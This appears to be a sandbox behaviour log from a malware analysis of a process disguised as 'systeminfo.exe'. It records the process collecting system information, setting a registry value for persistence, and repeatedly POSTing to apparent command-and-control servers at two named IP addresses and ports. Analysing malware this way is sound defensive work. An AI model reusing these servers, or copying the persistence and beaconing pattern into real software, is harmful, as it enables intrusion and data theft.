Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 135424	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 136422	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 137421	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 138419	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 139433	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 140588	2	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 141430	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 142413	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 143411	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 144410	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 145907	2	Fn
File	Create	filename = C:\ProgramData\FB70.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\ProgramData\FB70.tmp, type = size	1	Fn
System	Get Time	type = Ticks, time = 146906	1	Fn
System	Get Time	type = Ticks, time = 147904	1	Fn
System	Get Time	type = Ticks, time = 148902	1	Fn
File	Create	filename = C:\ProgramData\FB2F.tmp, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ	1	Fn
File	Get Info	filename = C:\ProgramData\FB2F.tmp, type = size	1	Fn
Module	Create Mapping	module_name = C:\ProgramData\FB2F.tmp, filename = C:\ProgramData\FB2F.tmp, protection = PAGE_READONLY, maximum_size = 0	1	Fn
Module	Map	C:\ProgramData\FB2F.tmp, process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, desired_access = FILE_MAP_READ	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 159.203.94.198, server_port = 8080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 159.203.94.198	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn

Thread 0x788

(Host: 11, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Load	module_name = advapi32.dll, base_address = 0x756e0000	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x758d0000	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75c50000	1	Fn
Module	Load	module_name = urlmon.dll, base_address = 0x76c40000	1	Fn
Module	Load	module_name = userenv.dll, base_address = 0x74b90000	1	Fn
Module	Load	module_name = wininet.dll, base_address = 0x75350000	1	Fn
Module	Load	module_name = wtsapi32.dll, base_address = 0x74bb0000	1	Fn
File	Create Temp File	filename = C:\ProgramData\FB2F.tmp, path = C:\ProgramData	1	Fn
File	Delete	filename = C:\ProgramData\FB2F.tmp	1	Fn
System	Get Time	type = Ticks, time = 129902	1	Fn
File	Delete	filename = C:\ProgramData\FB2F.tmp	1	Fn

Thread 0x720

(Host: 11, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Load	module_name = advapi32.dll, base_address = 0x756e0000	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x758d0000	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75c50000	1	Fn
Module	Load	module_name = urlmon.dll, base_address = 0x76c40000	1	Fn
Module	Load	module_name = userenv.dll, base_address = 0x74b90000	1	Fn
Module	Load	module_name = wininet.dll, base_address = 0x75350000	1	Fn
Module	Load	module_name = wtsapi32.dll, base_address = 0x74bb0000	1	Fn
File	Create Temp File	filename = C:\ProgramData\FB70.tmp, path = C:\ProgramData	1	Fn
File	Delete	filename = C:\ProgramData\FB70.tmp	1	Fn
System	Get Time	type = Ticks, time = 129902	1	Fn
File	Delete	filename = C:\ProgramData\FB70.tmp	1	Fn

Thread 0x644

(Host: 11, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Load	module_name = advapi32.dll, base_address = 0x756e0000	1	Fn
Module	Load	module_name = crypt32.dll, base_address = 0x758d0000	1	Fn
Module	Load	module_name = shell32.dll, base_address = 0x75c50000	1	Fn
Module	Load	module_name = urlmon.dll, base_address = 0x76c40000	1	Fn
Module	Load	module_name = userenv.dll, base_address = 0x74b90000	1	Fn
Module	Load	module_name = wininet.dll, base_address = 0x75350000	1	Fn
Module	Load	module_name = wtsapi32.dll, base_address = 0x74bb0000	1	Fn
File	Create Temp File	filename = C:\ProgramData\FB6F.tmp, path = C:\ProgramData	1	Fn
File	Delete	filename = C:\ProgramData\FB6F.tmp	1	Fn
System	Get Time	type = Ticks, time = 129902	1	Fn
File	Delete	filename = C:\ProgramData\FB6F.tmp	1	Fn

Thread 0x51c

(Host: 7, Network: 0)

Category	Operation	Information	Count	Logfile
Module	Load	module_name = advapi32.dll, base_address = 0x756e0000	1	Fn
Module	Load	module_name = mpr.dll, base_address = 0x741e0000	1	Fn
Module	Load	module_name = netapi32.dll, base_address = 0x741c0000	1	Fn
Module	Load	module_name = SAMCLI.DLL, base_address = 0x74170000	1	Fn
Module	Load	module_name = userenv.dll, base_address = 0x74b90000	1	Fn
Module	Load	module_name = wtsapi32.dll, base_address = 0x74bb0000	1	Fn
System	Get Time	type = Ticks, time = 129980	1	Fn

Thread 0x968

(Host: 14, Network: 11)

Category	Operation	Information	Count	Logfile
System	Get Time	type = Ticks, time = 132554	1	Fn
Module	Get Filename	process_name = c:\users\aetadzjz\appdata\local\microsoft\windows\systeminfo.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe, size = 260	1	Fn
System	Get Info	type = Operating System	1	Fn
System	Get Info	type = Hardware Information	1	Fn
Inet	Open Session	user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG	1	Fn
Inet	Open Connection	protocol = HTTP, server_name = 173.201.20.6, server_port = 7080	1	Fn
Inet	Open HTTP Request	http_verb = POST, http_version = HTTP 1.1, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD	1	Fn
Inet	Send HTTP Request	headers = WINHTTP_NO_ADDITIONAL_HEADERS, url = 173.201.20.6	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4	1	Fn Data
Inet	Query HTTP Info	flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_CONTENT_LENGTH, size_out = 4	1	Fn Data
Inet	Read Response	size = 148, size_out = 148	1	Fn Data
Inet	Read Response	size = 0, size_out = 0	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Inet	Close Session	-	1	Fn
Registry	Write Value	value_name = systeminfo, data = "C:\Users\aETAdzjz\AppData\Local\Microsoft\Windows\systeminfo.exe", size = 134, type = REG_SZ	1	Fn
System	Get Time	type = Ticks, time = 133911	3	Fn
System	Get Time	type = Ticks, time = 134020	1	Fn
System	Get Time	type = Ticks, time = 134909	3	Fn
System	Get Time	type = Ticks, time = 134987	1	Fn
System	Get Time	type = Ticks, time = 135908	3	Fn
System	Get Time	type = Ticks, time = 135986	1	Fn
System	Get Time	type = Ticks, time = 136906	3	Fn
